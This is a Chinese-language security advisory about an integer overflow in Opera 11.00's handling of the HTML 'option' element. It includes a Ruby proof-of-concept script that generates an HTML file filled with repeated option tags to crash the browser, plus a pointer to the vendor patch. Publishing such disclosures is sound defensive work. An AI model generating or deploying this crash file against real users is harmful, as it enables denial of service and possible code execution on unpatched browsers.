Opera Web Browser "option" HTML元素整数溢出漏洞
发布日期:2011-01-25
更新日期:2011-01-26
受影响系统:Opera Software Opera Web Browser 11.00
描述:
BUGTRAQ ID:
46003
Opera Web Browser是Opera Software开发的网络浏览器和互联网软件套装。
Opera Web Browser的"option" HTML元素在实现上存在安全漏洞,远程攻击者可利用此漏洞执行任意代码并造成拒绝服务。
<*来源:C4SS!0 G0M3S
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
print "[*]Creating the Exploit\n"
i = 0
buf = "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
while i<0x4141
buf += "<option>AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA</option>\n"
i+=1
end
HTML =
"<html>\n"+
"<body>\n\n"+
"<select>\n\n"
HTML+=buf * 100
HTML += "\n\n\n\</select>\n\n"+
"</body>\n\n\n"+
"</html>\n\n\n\n\n"
f = File.open("Exploit_opera_11.00.html","w")
f.puts HTML
f.close
puts "\n\n\[*]File Created With Sucess"
sleep(1)
puts "[*]Go to my Site www.invasao.com.br!"
sleep(1)
建议:
厂商补丁:
Opera Software
--------------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:
http://www.opera.com浏览次数:1993
严重程度:0(网友投票)
